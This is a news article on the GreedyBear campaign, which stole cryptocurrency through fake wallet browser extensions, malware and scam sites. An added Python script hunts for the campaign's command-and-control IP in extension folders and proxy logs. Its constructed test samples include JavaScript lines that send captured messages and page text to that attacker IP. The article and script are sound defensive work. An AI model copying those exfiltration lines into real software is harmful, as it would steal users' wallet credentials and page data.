GreedyBear Crypto Scammers Steal Over $1 Million with Fake Extensions, Malware, and Scam Websites

Friday, Aug 8, 2025 4:03 am ET


A newly discovered campaign dubbed GreedyBear has leveraged over 650 malicious tools to steal over $1 million in cryptocurrency. The campaign, which includes malicious browser extensions, malware, and scam websites, has targeted cryptocurrency wallet users and employed AI-generated code to scale and diversify attacks [1].

The GreedyBear group has published more than 150 fake browser extensions on the Firefox add-on marketplace that impersonate popular wallets such as MetaMask and TronLink. The extensions are built to capture the wallet credentials a user enters and exfiltrate them to an attacker-controlled server [1]. The campaign also distributes malicious executables through Russian websites offering cracked and pirated software, which deliver credential stealers, trojans, and ransomware [1].

In addition to browser extensions, GreedyBear has set up scam sites that pose as cryptocurrency products and services. These sites aim to trick users into parting with their wallet credentials or payment details, resulting in credential theft and financial fraud [1].

Koi Security researcher Tuval Admoni described GreedyBear's approach as an industrial-scale crypto theft operation that blends multiple proven attack methods into one coordinated operation [1]. All three arms of the campaign report back to a single IP address (185.208.156[.]66) that acts as the command-and-control (C2) server for data collection and management, a sign of one coordinated operator rather than several independent crews, and a single network indicator that defenders can block and hunt for [1].

The campaign has since expanded beyond Firefox to other browser marketplaces. A Google Chrome extension named Filecoin Wallet used the same C2 server and the same underlying credential-stealing logic, showing that the group is broadening its reach rather than starting a separate operation [1].
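Because both the Firefox extensions and the Chrome extension embed the same C2 address, that address is the most practical thing to hunt for on an endpoint and in network logs. The script below is an added example, not code from Koi Security or The Hacker News: it walks an extension store (Chrome's Extensions/ folder or a Firefox profile's extensions/ folder, including packed .xpi files, which are zip containers) for files that reference the C2 IP, and flags outbound connections to it in key=value proxy logs. The extension files and log lines it scans are constructed in a temporary directory for the demonstration and are not real GreedyBear samples; the log format and the fake extension names are assumptions.

```python
"""Hunt for the GreedyBear C2 address in unpacked/packed browser extensions
and in proxy logs. Added example; sample data below is constructed."""
import re
import tempfile
import zipfile
from pathlib import Path

# IOC from the article, reported defanged as 185.208.156[.]66
GREEDYBEAR_C2_DEFANGED = "185.208.156[.]66"

TEXT_SUFFIXES = {".js", ".json", ".html", ".css", ".txt"}
ARCHIVE_SUFFIXES = {".xpi", ".crx", ".zip"}  # zip containers (.crx carries a header first)

# Constructed proxy log lines (assumed key=value format, not from the article).
# Line 3 hits a neighbouring address and must NOT be flagged.
SAMPLE_LOG = [
    "2025-08-07T21:14:02Z src=10.1.4.23 dst=203.0.113.5 dport=443 action=allow",
    "2025-08-07T21:14:09Z src=10.1.4.23 dst=185.208.156.66 dport=80 action=allow",
    "2025-08-07T21:15:41Z src=10.1.4.88 dst=185.208.156.6 dport=443 action=allow",
    "2025-08-07T21:16:00Z src=10.1.4.51 dst=185.208.156.66 dport=443 action=allow",
]
LOG_FIELD = re.compile(r"(\w+)=(\S+)")


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def ip_pattern(ip: str) -> re.Pattern:
    """Match a bare IPv4 literal only: 185.208.156.66 must not match inside
    185.208.156.660 or 1185.208.156.66."""
    return re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])")


def scan_text(pattern: re.Pattern, text: str, source: str) -> list:
    """Return (source, line_no, excerpt) for every line matching the IOC."""
    return [(source, n, line.strip()[:120])
            for n, line in enumerate(text.splitlines(), 1) if pattern.search(line)]


def scan_extensions(root: Path, ioc: str = GREEDYBEAR_C2_DEFANGED) -> list:
    """Walk an extension store and report files that embed the C2 address.
    Packed archives are opened with zipfile and scanned entry by entry."""
    pattern = ip_pattern(refang(ioc))
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.suffix in TEXT_SUFFIXES:
            hits += scan_text(pattern, path.read_text(errors="replace"), str(path))
        elif path.suffix in ARCHIVE_SUFFIXES and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as zf:
                for name in zf.namelist():
                    if Path(name).suffix in TEXT_SUFFIXES:
                        text = zf.read(name).decode("utf-8", errors="replace")
                        hits += scan_text(pattern, text, f"{path}!{name}")
    return hits


def scan_proxy_log(lines, ioc: str = GREEDYBEAR_C2_DEFANGED) -> list:
    """Return (timestamp, src, dport) for every connection whose dst is the C2.
    Exact string comparison, so 185.208.156.6 is not a false positive."""
    c2 = refang(ioc)
    flagged = []
    for line in lines:
        fields = dict(LOG_FIELD.findall(line))
        if fields.get("dst") == c2:
            flagged.append((line.split()[0], fields.get("src"), fields.get("dport")))
    return flagged


def build_sample_tree(base: Path) -> Path:
    """Constructed data: a benign unpacked extension, a fake wallet extension
    (hypothetical name) whose background script posts to the C2, and a packed
    Firefox .xpi doing the same. None of this is a real GreedyBear sample."""
    benign = base / "chrome" / "Extensions" / "benignext" / "1.0"
    benign.mkdir(parents=True, exist_ok=True)
    (benign / "manifest.json").write_text('{"name": "Benign Ext", "version": "1.0"}')
    (benign / "background.js").write_text('fetch("https://api.example.com/v1/ping");\n')

    fake = base / "chrome" / "Extensions" / "fakewallet" / "2.3"
    fake.mkdir(parents=True, exist_ok=True)
    (fake / "manifest.json").write_text('{"name": "Wallet Helper", "version": "2.3"}')
    (fake / "background.js").write_text('const C2 = "http://185.208.156.66/collect";\n'
                                        'chrome.runtime.onMessage.addListener(m => fetch(C2, {method: "POST", body: JSON.stringify(m)}));\n')

    xpi = base / "firefox" / "extensions" / "wallet@example.xpi"
    xpi.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(xpi, "w") as zf:
        zf.writestr("manifest.json", '{"name": "Wallet Helper FF", "version": "1.1"}')
        zf.writestr("content.js", 'navigator.sendBeacon("http://185.208.156.66/s", document.body.innerText);\n')
    return base


def demo_hunt() -> dict:
    """Build the constructed tree in a temp dir and run both hunts over it."""
    with tempfile.TemporaryDirectory() as tmp:
        base = build_sample_tree(Path(tmp))
        return {"extensions": scan_extensions(base), "connections": scan_proxy_log(SAMPLE_LOG)}


if __name__ == "__main__":
    result = demo_hunt()
    for src, n, line in result["extensions"]:
        print(f"[extension] {src}:{n}: {line}")
    for ts, src, dport in result["connections"]:
        print(f"[network] {ts} {src} -> {refang(GREEDYBEAR_C2_DEFANGED)}:{dport}")
```

On a real host, point `scan_extensions` at the browser's extension folder and feed `scan_proxy_log` your own egress logs after adapting `LOG_FIELD` to their format. A literal-IP hunt catches the samples described in the article, but an extension that obfuscates or splits its C2 string will evade it, so treat a clean result as absence of this specific indicator, not as proof the extension is benign.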

GreedyBear is not running a single toolset but a broad malware distribution pipeline that can shift tactics as needed [1]. For defenders, the practical consequence is that the installed extension list and outbound connections to the shared C2 address are both worth hunting for, and that wallet extensions should be installed only from the wallet vendor's own verified listing.

References:
[1] https://thehackernews.com/2025/08/greedybear-steals-1m-in-crypto-using.html
[2] https://en.coinotag.com/greedybear-cybercrime-group-exploits-browser-extensions-and-malware-to-steal-over-1-million-in-crypto/
